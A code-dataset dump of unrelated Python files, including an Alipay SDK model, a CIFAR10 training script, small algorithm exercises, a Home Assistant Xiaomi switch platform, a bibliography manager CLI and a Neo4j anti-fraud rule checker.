@layer_name.setter\n def layer_name(self, value):\n self._layer_name = value\n @property\n def layer_version_name(self):\n return self._layer_version_name\n\n @layer_version_name.setter\n def layer_version_name(self, value):\n self._layer_version_name = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.biz_app_id:\n if hasattr(self.biz_app_id, 'to_alipay_dict'):\n params['biz_app_id'] = self.biz_app_id.to_alipay_dict()\n else:\n params['biz_app_id'] = self.biz_app_id\n if self.biz_env_id:\n if hasattr(self.biz_env_id, 'to_alipay_dict'):\n params['biz_env_id'] = self.biz_env_id.to_alipay_dict()\n else:\n params['biz_env_id'] = self.biz_env_id\n if self.function_name:\n if hasattr(self.function_name, 'to_alipay_dict'):\n params['function_name'] = self.function_name.to_alipay_dict()\n else:\n params['function_name'] = self.function_name\n if self.layer_name:\n if hasattr(self.layer_name, 'to_alipay_dict'):\n params['layer_name'] = self.layer_name.to_alipay_dict()\n else:\n params['layer_name'] = self.layer_name\n if self.layer_version_name:\n if hasattr(self.layer_version_name, 'to_alipay_dict'):\n params['layer_version_name'] = self.layer_version_name.to_alipay_dict()\n else:\n params['layer_version_name'] = self.layer_version_name\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipayCloudCloudbaseFunctionLayerBindModel()\n if 'biz_app_id' in d:\n o.biz_app_id = d['biz_app_id']\n if 'biz_env_id' in d:\n o.biz_env_id = d['biz_env_id']\n if 'function_name' in d:\n o.function_name = d['function_name']\n if 'layer_name' in d:\n o.layer_name = d['layer_name']\n if 'layer_version_name' in d:\n o.layer_version_name = d['layer_version_name']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipayCloudCloudbaseFunctionLayerBindModel.py","file_name":"AlipayCloudCloudbaseFunctionLayerBindModel.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"431788585","text":"import argparse\nimport itertools\nimport os\nimport random\nimport sys\nimport json\n\nimport torch\nimport torchvision\n\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import CIFAR10\n\nfrom cs236781.train_results import FitResult\nimport training\n\n\ndef run_experiment(run_name, out_dir='./results', seed=None, device=None,\n # Training params\n bs_train=128, bs_test=None, batches=100, epochs=100,\n early_stopping=3, checkpoints=None, lr=1e-3, reg=1e-3,\n # Model params\n filters_per_layer=[64], layers_per_block=2, pool_every=2,\n hidden_dims=[1024], model_type='cnn',\n **kw):\n \"\"\"\n Executes a single run of a Part3 experiment with a single configuration.\n\n These parameters are populated by the CLI parser below.\n See the help string of each parameter for it's meaning.\n \"\"\"\n if not seed:\n seed = random.randint(0, 2 ** 31)\n torch.manual_seed(seed)\n if not bs_test:\n bs_test = max([bs_train // 4, 1])\n cfg = locals()\n\n tf = torchvision.transforms.ToTensor()\n ds_train = CIFAR10(root=DATA_DIR, download=True, train=True, transform=tf)\n ds_test = CIFAR10(root=DATA_DIR, download=True, train=False, transform=tf)\n\n if not device:\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n # Select model class\n if model_type not in MODEL_TYPES:\n raise ValueError(f\"Unknown model type: {model_type}\")\n model_cls = MODEL_TYPES[model_type]\n\n # TODO: Train\n # - Create model, loss, optimizer and trainer based on the parameters.\n # Use the model you've implemented previously, cross entropy loss and\n # any optimizer that you wish.\n # - Run training and save the FitResults in the fit_res variable.\n # - The fit results and all the experiment parameters will then be saved\n # for you automatically.\n fit_res = None\n # ====== YOUR CODE: ======\n x0, _ = ds_train[0]\n model = model_cls(x0.shape, 10, sorted(filters_per_layer * layers_per_block), pool_every, hidden_dims)\n model = model.to(device)\n loss = torch.nn.CrossEntropyLoss()\n\n optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=10*reg)\n trainer = training.TorchTrainer(model, loss, optimizer, device)\n\n dl_train = DataLoader(ds_train, bs_train, shuffle=False)\n dl_test = DataLoader(ds_test, bs_test, shuffle=False)\n fit_res = trainer.fit(dl_train=dl_train, dl_test=dl_test,\n early_stopping=early_stopping,\n checkpoints=checkpoints, num_epochs=epochs, max_batches=batches)\n # ========================\n\n save_experiment(run_name, out_dir, fit_res)\n\n\ndef save_experiment(run_name, out_dir, fit_res):\n output = dict(\n results=fit_res._asdict()\n )\n\n output_filename = f'{os.path.join(out_dir, run_name)}.json'\n os.makedirs(out_dir, exist_ok=True)\n with open(output_filename, 'w') as f:\n json.dump(output, f, indent=2)\n\n print(f'*** Output file {output_filename} written')\n\n\ndef load_experiment(filename):\n with open(filename, 'r') as f:\n output = json.load(f)\n\n fit_res = FitResult(**output['results'])\n\n return fit_res\n\n\ndef parse_cli():\n p = argparse.ArgumentParser(description='CS236781 HW2 Experiments')\n sp = p.add_subparsers(help='Sub-commands')\n\n # Experiment config\n sp_exp = sp.add_parser('run-exp', help='Run experiment with a single '\n 'configuration')\n sp_exp.set_defaults(subcmd_fn=run_experiment)\n sp_exp.add_argument('--run-name', '-n', type=str,\n help='Name of run and output file', required=True)\n sp_exp.add_argument('--out-dir', '-o', type=str, help='Output folder',\n default='./results', required=False)\n sp_exp.add_argument('--seed', '-s', type=int, help='Random seed',\n default=None, required=False)\n sp_exp.add_argument('--device', '-d', type=str,\n help='Device (default is autodetect)',\n default=None, required=False)\n\n # # Training\n sp_exp.add_argument('--bs-train', type=int, help='Train batch size',\n default=128, metavar='BATCH_SIZE')\n sp_exp.add_argument('--bs-test', type=int, help='Test batch size',\n metavar='BATCH_SIZE')\n sp_exp.add_argument('--batches', type=int,\n help='Number of batches per epoch', default=100)\n sp_exp.add_argument('--epochs', type=int,\n help='Maximal number of epochs', default=100)\n sp_exp.add_argument('--early-stopping', type=int,\n help='Stop after this many epochs without '\n 'improvement', default=3)\n sp_exp.add_argument('--checkpoints', type=int,\n help='Save model checkpoints to this file when test '\n 'accuracy improves', default=None)\n sp_exp.add_argument('--lr', type=float,\n help='Learning rate', default=1e-3)\n sp_exp.add_argument('--reg', type=float,\n help='L2 regularization', default=1e-3)\n\n # # Model\n sp_exp.add_argument('--filters-per-layer', '-K', type=int, nargs='+',\n help='Number of filters per conv layer in a block',\n metavar='K', required=True)\n sp_exp.add_argument('--layers-per-block', '-L', type=int, metavar='L',\n help='Number of layers in each block', required=True)\n sp_exp.add_argument('--pool-every', '-P', type=int, metavar='P',\n help='Pool after this number of conv layers',\n required=True)\n sp_exp.add_argument('--hidden-dims', '-H', type=int, nargs='+',\n help='Output size of hidden linear layers',\n metavar='H', required=True)\n sp_exp.add_argument('--model-type', '-M',\n choices=MODEL_TYPES.keys(),\n default='cnn', help='Which model instance to create')\n\n parsed = p.parse_args()\n\n if 'subcmd_fn' not in parsed:\n p.print_help()\n sys.exit()\n return parsed\n\n\nif __name__ == '__main__':\n parsed_args = parse_cli()\n subcmd_fn = parsed_args.subcmd_fn\n del parsed_args.subcmd_fn\n print(f'*** Starting {subcmd_fn.__name__} with config:\\n{parsed_args}')\n subcmd_fn(**vars(parsed_args))\n","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":6540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"101134156","text":"def search(nums,target,low,high):\n '''\n 我们发现循环数组存在一个性质:以数组中间点为分区,会将数组分成一个有序数组和一个循环有序数组。\n\n如果首元素小于 mid,说明前半部分是有序的,后半部分是循环有序数组;\n如果首元素大于 mid,说明后半部分是有序的,前半部分是循环有序的数组;\n如果目标元素在有序数组范围中,使用二分查找;\n如果目标元素在循环有序数组中,设定数组边界后,使用以上方法继续查找。\n '''\n\n mid = low + ((high - low)>>1)\n\n if nums[0] < nums[mid]:\n res = bserch(nums[:mid], target)\n if res:\n return res - 1\n else:\n return search(nums[mid:], target,mid,7)\n if nums[0] > nums[mid]:\n res = bserch(nums[mid + 1:], target)\n if res:\n return res - 1\n else:\n return search(nums[:mid+1],target,0,mid+1)\n\ndef bserch(arr, val):\n low = 0\n high = len(arr) - 1\n while low <= high:\n mid = low + ((high - low) >> 1)\n if val < arr[mid]:\n high = mid - 1\n if val > arr[mid]:\n low = mid + 1\n if val == arr[mid]:\n return mid + 1\n return 0\n\nnums=[4,5,6,7,0,1,2,3]\ntarget=2\nprint(search(nums,target,0,7))","sub_path":"learn_notes/leetcode/round_list.py","file_name":"round_list.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"380639552","text":"from json import loads\nfrom requests import get\nfrom jmespath import search\nfrom heapq import nsmallest, nlargest\nfrom more_itertools import chunked\n\nJSON_LINK = loads(get(\"https://json-stat.org/samples/oecd.json\").text)\nYEARS = list(search('dimension.year.category.index', JSON_LINK).keys())\nCOUNTRIES = search('dimension.area.category.label.*', JSON_LINK)\n\n# The bottom line is that I have the count of chunk of values == number of years,\n# and the count of values in the chunk == count of countries. Then I can use indexes for search\nVALUES_CHUNKED_BY_YEARS = list(chunked(search('value', JSON_LINK), len(COUNTRIES)))\n\n\ndef best3_and_worth3_unemployment_rate_by_years():\n for i in VALUES_CHUNKED_BY_YEARS:\n print(YEARS[VALUES_CHUNKED_BY_YEARS.index(i)] + \"\\nLowest unemployment rate:\")\n for value in nsmallest(3, i):\n print(COUNTRIES[i.index(value)] + ': ' + str(value) + '%')\n print(\"\\nHighest unemployment rate:\")\n for value in nlargest(3, i):\n print(COUNTRIES[i.index(value)] + ': ' + str(value) + '%')\n print('\\n')\n\n\nif __name__ == '__main__':\n best3_and_worth3_unemployment_rate_by_years()\n","sub_path":"TietoEVRY.py","file_name":"TietoEVRY.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"70940934","text":"import time\nprimes = []\nstart = time.time()\nfor i in range(100000):\n primes.append(0)\ninit = time.time()\nprint(\"init took\", init - start, \"seconds\")\nprimecount = 0\nfor i in range(2,100000):\n is_prime = True\n for index in range(0, primecount):\n if i%primes[index] == 0:\n is_prime = False\n break\n if is_prime:\n primes[primecount] = i\n primecount += 1\nprint(\"Found \", len(primes), \"primes\")\nprint(\"search took\", time.time() - init, \"seconds\")\n","sub_path":"Topics/16_Speed/src/primes2.py","file_name":"primes2.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"337155705","text":"#coding=utf-8\n'''\n@author=Wangminhao Gou\n'''\n\nimport csv\ninputFile=r'E:\\DataAnalysis2\\dataset\\testSet.csv'\noutputFile=r'E:\\DataAnalysis2\\dataset\\testSet2.csv'\ndef datafill():\n with open(inputFile,'r') as inp1,open(outputFile,'w',newline='') as out1:\n rows=csv.reader(inp1)\n\n writer=csv.writer(out1)\n for row in rows:\n for i in range(0,len(row)):\n if row[i]=='':\n row[i]=0\n writer.writerow(row)\n\nif __name__=='__main__':\n datafill()","sub_path":"src/datafill2.py","file_name":"datafill2.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"56349178","text":"import asyncio\nimport json\nimport logging\nfrom functools import partial\n\nimport homeassistant.helpers.config_validation as cv\nimport voluptuous as vol\nfrom homeassistant.components.switch import PLATFORM_SCHEMA, SwitchEntity\nfrom homeassistant.const import CONF_HOST, CONF_NAME, CONF_TOKEN\nfrom homeassistant.exceptions import PlatformNotReady\nfrom miio.device import Device\nfrom miio.exceptions import DeviceException\nfrom miio.miot_device import MiotDevice\n\nfrom . import ToggleableMiotDevice\nfrom .deps.const import (\n DOMAIN,\n CONF_UPDATE_INSTANT,\n CONF_MAPPING,\n CONF_CONTROL_PARAMS,\n CONF_CLOUD,\n CONF_MODEL,\n ATTR_STATE_VALUE,\n ATTR_MODEL,\n ATTR_FIRMWARE_VERSION,\n ATTR_HARDWARE_VERSION,\n SCHEMA,\n)\n\nDOMAIN = 'xiaomi_miot_raw'\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_NAME = \"Generic MIoT switch\"\nDATA_KEY = \"switch.\" + DOMAIN\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n # {\n # vol.Required(CONF_HOST): cv.string,\n # vol.Required(CONF_TOKEN): vol.All(cv.string, vol.Length(min=32, max=32)),\n # vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n # vol.Optional(CONF_UPDATE_INSTANT, default=True): cv.boolean,\n # vol.Optional(CONF_CLOUD): vol.All(),\n \n # vol.Required(CONF_MAPPING):vol.All(),\n # vol.Required(CONF_CONTROL_PARAMS):vol.All(),\n # vol.Optional('cloud_write'):vol.All(),\n\n # }\n SCHEMA\n)\n\n# pylint: disable=unused-argument\n@asyncio.coroutine\ndef async_setup_platform(hass, config, async_add_entities, discovery_info=None):\n \"\"\"Set up the sensor from config.\"\"\"\n\n if DATA_KEY not in hass.data:\n hass.data[DATA_KEY] = {}\n\n host = config.get(CONF_HOST)\n token = config.get(CONF_TOKEN)\n mapping = config.get(CONF_MAPPING)\n\n _LOGGER.info(\"Initializing %s with host %s (token %s...)\", config.get(CONF_NAME), host, token[:5])\n\n try:\n miio_device = MiotDevice(ip=host, token=token, mapping=mapping)\n device_info = miio_device.info()\n model = device_info.model\n _LOGGER.info(\n \"%s %s %s detected\",\n model,\n device_info.firmware_version,\n device_info.hardware_version,\n )\n\n device = MiotSwitch(miio_device, config, device_info, hass)\n except DeviceException:\n raise PlatformNotReady\n\n hass.data[DOMAIN]['entities'][device.unique_id] = device\n async_add_entities([device], update_before_add=True)\n\nasync def async_setup_entry(hass, config_entry, async_add_entities):\n config = hass.data[DOMAIN]['configs'].get(config_entry.entry_id, dict(config_entry.data))\n await async_setup_platform(hass, config, async_add_entities)\n\nclass MiotSwitch(ToggleableMiotDevice, SwitchEntity):\n pass\n","sub_path":"custom_components/xiaomi_miot_raw/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"426710094","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\n\nfrom bibpdf import database\nfrom bibpdf.file_object import PdfFile, CommentFile, PdfTempFile, BibTempFile\nfrom bibpdf.formatters import simple_format, misc, bibtex_format, file_name_format\n\npath = os.path\n\n\nclass Action(object):\n def __init__(self, func, arguments=list(), optional_arguments=None):\n self.func = func\n self.arguments = arguments\n self.optional_arguments = optional_arguments\n\n def execute(self):\n if self.optional_arguments:\n self.func(*self.arguments, **self.optional_arguments)\n else:\n self.func(*self.arguments)\n\n\ndef store_paper(args):\n new_keyword = {x.strip() for x in ' '.join(args.keyword).split(',')} if args.keyword else set()\n from bibpdf.readers import bibtex_read\n bib_file = BibTempFile()\n entry = bibtex_read.read(bib_file.open()).entries[0]\n entry['keyword'] = entry['keyword'] | new_keyword if 'keyword' in entry else new_keyword\n db = database.Database()\n\n print(simple_format.apply(entry))\n try:\n temp_pdf_file = PdfTempFile()\n print('\\tFile: {0}'.format(temp_pdf_file.file_name))\n except IOError:\n temp_pdf_file = None\n print('\\tFile: None')\n if input('(a)abort, (c)continue?') != 'c':\n print(\"aborted\")\n return\n\n actions = list()\n\n entry['ID'] = misc.get_id(entry)\n while entry['ID'] in db:\n old_id = entry['ID']\n old_entry = db[old_id]\n print('citation conflict!')\n print(simple_format.apply(old_entry))\n choice = input('(a)abort, (u)update entry, Input new citation?')\n if choice == 'a':\n print('aborted')\n return\n elif choice == 'u':\n break\n else:\n entry['ID'] = choice\n\n for position in ('author', 'editor'):\n if position in entry:\n for idx, person in enumerate(entry[position]):\n person_list = db.search_author(person[0], False)\n first_names = {x[1] for x in person_list}\n if not person_list or any(person[1] == name for name in first_names):\n continue\n print((\"Who's this author? ({0[0]}, {0[1]})\".format(person)))\n for idx2, old_person in enumerate(person_list):\n print(('{0}. {1}, {2}'.format(idx2, old_person[0].title(), old_person[1].title())))\n choice = input(\"(a)abort, or type 'number,new_name'\\n\").lower().strip()\n new_name = None\n if ',' in choice:\n choice, new_name = [a.strip() for a in choice.split(',', maxsplit=2)]\n if choice == 'a':\n print('aborted')\n return\n elif choice == 'n': # use new author\n person[1] = new_name if new_name else person[1]\n else:\n number = int(choice)\n if new_name:\n person[1] = new_name\n actions.append(Action(db.update_person, [person_list[number], person]))\n else:\n person[1] = person_list[number][1]\n\n for action in actions:\n action.execute()\n if temp_pdf_file:\n if 'pdf_file' not in entry and entry['ID'] in db and 'pdf_file' in db[entry['ID']]:\n entry['pdf_file'] = db[entry['ID']]['pdf_file']\n if 'pdf_file' not in entry:\n file_name = file_name_format.apply(entry)\n pdf_file = PdfFile(file_name, entry)\n temp_pdf_file.move(pdf_file)\n entry['pdf_file'] = [pdf_file.file_name]\n else: # add or replace file\n print(\"pdf_file exists!\")\n for idx, file_name in enumerate(entry['pdf_file']):\n print(idx, file_name)\n choice = input(\"(c)do nothing; (N) replace the Nth file; or put a short word as new file's suffix\")\n if choice != 'c':\n try:\n number = int(choice)\n file_name = entry['pdf_file'][number]\n pdf_file = PdfFile(file_name, entry)\n temp_pdf_file.move(pdf_file)\n except ValueError:\n file_name = file_name_format.apply(entry, choice)\n pdf_file = PdfFile(file_name, entry)\n temp_pdf_file.move(pdf_file)\n entry['pdf_file'].append(pdf_file.file_name)\n db[entry['ID']] = entry\n print('successfully inserted the following entry:')\n print(simple_format.apply(entry))\n\n\ndef search_paper(args):\n db = database.Database()\n if args.author:\n if args.keyword:\n keyword = {x.strip() for x in ' '.join(args.keyword).split(',')}\n author_list = db.search_author_keyword(args.author, keyword)\n else:\n author_list = db.search_author(args.author)\n print(misc.author_list(author_list))\n else:\n keyword = {x.strip() for x in ' '.join(args.keyword).split(',')}\n item_list = db.search_keyword(keyword)\n print(misc.item_list(item_list))\n\n\ndef open_file(args):\n db = database.Database()\n if args.paper_id not in db:\n print(\"{0} cannot be found in library\".format(args.paper_id))\n return\n if not args.files:\n args.files = ['pdf']\n\n entry = db[args.paper_id]\n for file_type in set(args.files):\n if file_type == 'pdf':\n pdf_files = [PdfFile(file_name) for file_name in entry['pdf_file']]\n if len(pdf_files) == 0:\n print(\"I don't have pdf file for {0}\\n\".format(args.paper_id))\n else:\n for file in pdf_files:\n file.open()\n if file_type == 'comment':\n comment_files = [CommentFile(file_name) for file_name in entry['comment_file']]\n if len(comment_files) == 0:\n new_comment = CommentFile(entry['ID'], entry)\n entry['comment_file'].append(new_comment.file_name)\n new_comment.open()\n db.add_file(entry['ID'], new_comment.file_name, 'comment')\n else:\n for file in comment_files:\n file.open()\n\n\ndef output(args) -> str:\n from bibpdf.readers import pandoc_read\n db = database.Database()\n if path.isfile(path.expanduser(args.source)):\n item_list = [db[item_id] for item_id in pandoc_read.read(open(args.source, 'r', encoding='UTF-8'))]\n elif args.source.lower() == 'all':\n item_list = list(db.values())\n else:\n item_list = [db[item_id.strip()] for item_id in args.source.split(',')]\n if args.format == 'bib':\n print(bibtex_format.apply(item_list))\n elif args.format == 'str':\n print(simple_format.apply(item_list))\n\n\ndef delete_paper(args):\n db = database.Database()\n del db[args.paper_id]\n print('{0} has been successfully deleted'.format(args.paper_id))\n\n\ndef modify_keyword(args):\n to_add = None\n to_delete = None\n if args.add:\n to_add = {x.strip() for x in ' '.join(args.add).split(',')}\n if args.delete:\n to_delete = {x.strip() for x in ' '.join(args.delete).split(',')}\n db = database.Database()\n if to_add or to_delete:\n db.update_keyword(args.paper_id, to_add, to_delete)\n entry = db[args.paper_id]\n print(simple_format.apply(entry))\n print('\\tKeywords: {0}'.format(', '.join(entry['keyword'])))\n\n\ndef main():\n parser = argparse.ArgumentParser(\"bibpdf\", description=\"a tool to manage literature library\",\n epilog=\"citation is usually $first_author_last_name$year\")\n subparsers = parser.add_subparsers(help='commands')\n\n search_parser = subparsers.add_parser('s', help='search paper')\n search_parser.set_defaults(func=search_paper)\n search_parser.add_argument('-a', '--author')\n search_parser.add_argument('-k', '--keyword', nargs=\"+\")\n\n open_parser = subparsers.add_parser('o', help='open file')\n open_parser.set_defaults(func=open_file)\n open_parser.add_argument('paper_id')\n open_parser.add_argument('-c', '--comment', dest='files', action='append_const', const='comment')\n open_parser.add_argument('-p', '--pdf', dest='files', action='append_const', const='pdf')\n\n add_parser = subparsers.add_parser('a', help='add entry')\n add_parser.set_defaults(func=store_paper)\n add_parser.add_argument('keyword', nargs=\"*\", help='give a list of keyword separated by colons')\n\n add_parser = subparsers.add_parser('d', help='delete entry')\n add_parser.set_defaults(func=delete_paper)\n add_parser.add_argument('paper_id')\n\n output_parser = subparsers.add_parser('u', help='output information')\n output_parser.set_defaults(func=output)\n output_parser.add_argument('source', help=\"supply a list of paper ids or find Pandoc token file \"\n \"to extract a minimal reference list\")\n output_format = output_parser.add_mutually_exclusive_group(required=True)\n output_format.add_argument('-b', '--bibtex', dest=\"format\", action='store_const', const='bib',\n help='output bibtex file')\n output_format.add_argument('-s', '--string', dest=\"format\", action='store_const', const='str',\n help='output a simple string')\n\n key_parser = subparsers.add_parser('k', help='manipulate keywords')\n key_parser.set_defaults(func=modify_keyword)\n key_parser.add_argument('paper_id')\n key_parser.add_argument('-a', '--add', nargs=\"+\", help='keywords to add, separate by colon')\n key_parser.add_argument('-d', '--delete', nargs=\"+\", help='keywords to delete, separate by colon')\n\n args = parser.parse_args()\n try:\n args.func(args)\n except AttributeError:\n parser.print_help()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bibpdf/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"632186225","text":"def sumgcd(n):\n for i in range(2, n):\n if n / i == n // i:\n return n // i, n - n // i\n return 1, n - 1\n\n\nsumgcd_in = open('sumgcd.in', 'r')\nsumgcd_out = open('sumgcd.out', 'w')\n\nn = int(sumgcd_in.readline())\nans = sumgcd(n)\nprint(*ans, file=sumgcd_out)\nsumgcd_in.close()\nsumgcd_out.close()\n","sub_path":"lKSH/final/sumgcd.py","file_name":"sumgcd.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"340129197","text":"import os\nimport json\n\nimport uuid\nimport shutil\n\nimport rino.core.config as config\nfrom rino.core.commit import Commit\nfrom rino.core.tree import TreeCollection\n\n\nclass UIDExists(Exception):\n pass\n\n\nclass NameExists(Exception):\n pass\n\n\nclass Repository:\n \"\"\"\n Repository.\n\n Handles the creation and info on a repo.\n Also acts as a collection of commits.\n \"\"\"\n\n rinofile_proto = {\n \"uid\": \"\",\n \"commits\": [],\n \"tree\": [],\n \"remote\": []\n }\n\n def __init__(self, directory=None):\n if directory is None:\n directory = os.getcwd()\n\n self.info = None\n self.saved = False\n self.parent = directory\n self.dir = os.path.join(directory, 'rino')\n self.rinofile_path = os.path.join(self.dir, 'rinofile.json')\n\n if os.path.isfile(self.rinofile_path) and os.path.isdir(self.dir):\n self.saved = True\n\n if self.saved is False:\n self.info = self.rinofile_proto\n self.info[\"uid\"] = str(uuid.uuid4()).replace('-', '')\n\n if self.info is None:\n self.info = json.load(open(self.rinofile_path))\n\n def __getitem__(self, key):\n return self.info[key]\n\n def __setitem__(self, key, value):\n self.info[key] = value\n self.write_config()\n\n def write_config(self):\n with open(self.rinofile_path, 'w') as outfile:\n return json.dump(self.info, outfile, indent=3, sort_keys=True)\n\n def save(self):\n if os.path.isfile(self.rinofile_path) and os.path.isdir(self.dir):\n self.saved = True\n return False, 'repository already exists.'\n else:\n self.saved = True\n os.makedirs(self.dir)\n config.append(\"repositories\", self.dir)\n self.write_config()\n return True, 'initialised rino repository.'\n\n def add(self, rel_paths, parameter=False, compare_uid=None):\n\n if compare_uid is None:\n last_commit = Commit(self, self.find('checkedout'))\n else:\n last_commit = Commit(self, compare_uid)\n\n abspaths = [os.path.join(self.parent, ppath) for ppath in rel_paths]\n tr = TreeCollection(abspaths, self.parent)\n tr.compare_status(self.parent, last_commit.dir)\n\n self.info[\"tree\"] = tr.tree\n\n if self.saved:\n self.write_config()\n\n return True, \"Added files.\"\n\n def add_remote(self, name, path):\n if name in [v[\"name\"] for v in self.info[\"remote\"]]:\n return False, 'name aleady exists.'\n\n self.info[\"remote\"].append({\n 'name': name,\n 'path': path\n })\n\n self.write_config()\n\n def remove_remote(self, name):\n if name in [v[\"name\"] for v in self.info[\"remote\"]]:\n filtered = [v for v in self.info[\"remote\"] if not v[\"name\"] == name]\n self.info[\"remote\"] = filtered\n self.write_config()\n\n def uid_to_name(self, uid):\n t = [x[\"name\"] for x in self.info[\"commits\"] if x[\"uid\"] == uid]\n if len(t):\n return os.path.join(self.dir, t[0])\n else:\n return None\n\n def name_to_uid(self, name):\n if name in self.info[\"commits\"].values():\n for key, val in self.info[\"commits\"].iteritems():\n if name == val:\n return key\n else:\n return None\n\n def checkout(self, commit):\n d = {\n \"uid\": commit[\"uid\"],\n \"name\": commit[\"name\"],\n \"date\": commit[\"date\"]\n }\n self.info[\"checkedout\"] = d\n self.write_config()\n\n def register_commit(self, uid, info):\n if uid in [x[\"uid\"] for x in self.info[\"commits\"]]:\n raise UIDExists(\"uid <\" + uid + \"> already exists.\")\n if info[\"name\"] in [x[\"name\"] for x in self.info[\"commits\"]]:\n raise NameExists(\"name <\" + info[\"name\"] + \"> already exists.\")\n\n d = {\n \"uid\": info[\"uid\"],\n \"name\": info[\"name\"],\n \"date\": info[\"date\"]\n }\n\n self.info[\"commits\"].append(d)\n self.info[\"checkedout\"] = d\n self.info[\"tree\"] = []\n self.write_config()\n\n def find(self, key, val=None):\n if key == \"checkedout\":\n if self.is_any_commits():\n return self.info[\"checkedout\"][\"uid\"]\n if key == \"latest\":\n if self.is_any_commits():\n self.info[\"commits\"].sort(key=lambda item: item['date'], reverse=True)\n return self.info[\"commits\"][0][\"uid\"]\n else:\n return False\n return False\n\n def find_by_partial(self, partial_uid):\n if len(partial_uid) < 6:\n return False, \"pass at least 6 digits of the uid.\"\n\n uids = [item[\"uid\"] for item in self.info[\"commits\"]]\n matches = [s for i, s in enumerate(uids) if partial_uid in s]\n\n if len(matches):\n return matches[0]\n else:\n return None\n\n def is_any_commits(self):\n return len(self.info[\"commits\"]) > 0\n\n def size(self):\n size = 0\n num_files = 0\n\n for item in self.info[\"commits\"]:\n commit = Commit(self, item[\"uid\"])\n\n size += commit[\"size\"]\n num_files += commit[\"num_files\"]\n\n size_str = TreeCollection.h_string(size)\n\n return num_files, size, size_str\n\n def zip(self):\n zipname = os.path.join(self.parent, 'rino')\n shutil.make_archive(zipname, 'zip', self.dir)\n return zipname\n","sub_path":"rino/core/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"617713513","text":"from imassbank.riskModel.common.codeEnum import riskRuleCode\n\nfrom imassbank.riskModel.common.riskRuleResult import save_check_result\nfrom .Neo4jHandler import Neo4jHandler\n\n\ndef is_neo4j_rule_pass(model_no, json_data, order_id):\n \"\"\"\n Neo4j 反欺诈规则过滤\n :param order_id:\n :param json_data:\n :return:\n \"\"\"\n handler = Neo4jHandler()\n\n final_result = []\n if not handler.parse_data(model_no, json_data):\n final_result.append(riskRuleCode.DATA_PARSE_ERROR.name)\n else:\n # 身份证绑定检查\n if handler.check_id_num_bind():\n result = 0\n final_result.append(riskRuleCode.ID_CARD_MULT_BIND.name)\n else:\n result = 1\n save_check_result(order_id, riskRuleCode.ID_CARD_MULT_BIND.name, result, result)\n\n # 手机号码检测\n if handler.check_phone_num_bind():\n result = 0\n final_result.append(riskRuleCode.PHONE_NUM_MULT_BIND.name)\n else:\n result = 1\n save_check_result(order_id, riskRuleCode.PHONE_NUM_MULT_BIND.name, result, result)\n\n # 紧急联系人检测\n if handler.check_emerg_contact():\n result = 0\n final_result.append(riskRuleCode.EMERG_CON_MULT_BIND.name)\n else:\n result = 1\n save_check_result(order_id, riskRuleCode.EMERG_CON_MULT_BIND.name, result, result)\n\n # 紧急联系人近期有申请\n if handler.check_emerg_apply():\n result = 0\n final_result.append(riskRuleCode.EMERG_CON_REC_APPLY.name)\n else:\n result = 1\n save_check_result(order_id, riskRuleCode.EMERG_CON_REC_APPLY.name, result, result)\n\n handler.close()\n return final_result\n","sub_path":"riskcontrol/imassbank/riskModel/antifraud/neo4jcheck.py","file_name":"neo4jcheck.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"495592709","text":"import PyWaMG as wp\r\nimport datetime as dt\r\nnow = dt.datetime.now()\r\nwp.wa_login(isHeadless=False)\r\n\r\nnumber=\"+918866663221\"\r\n\r\nfpath=\"D:/ARTH/SummerInternship2021/task6/Face Recognition/img.jpg\"\r\nmsg = \"ALERT! ALERT! ALERT!\"\r\n\r\nwp.send_txt(number,msg,wait=0,times=1,appendMessageNumber = True,isInContacts = True,showLogs = True)\r\nwp.send_file(number,fpath,isInContacts=False,showLogs=True) ","sub_path":"whatsapp.py","file_name":"whatsapp.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"402774176","text":"import Tkinter as tk\n\nfrom area_console import AreaConsole\nfrom area_dissected_stream import AreaDissectedStream\nfrom area_dissector_builder import AreaDissectorBuilder\nfrom area_packet_stream import AreaPacketStream\nfrom area_project_navigation import AreaProjectNavigation\nfrom area_raw_data import AreaRawData\nfrom dialog_export_project import DialogExportProject\nfrom 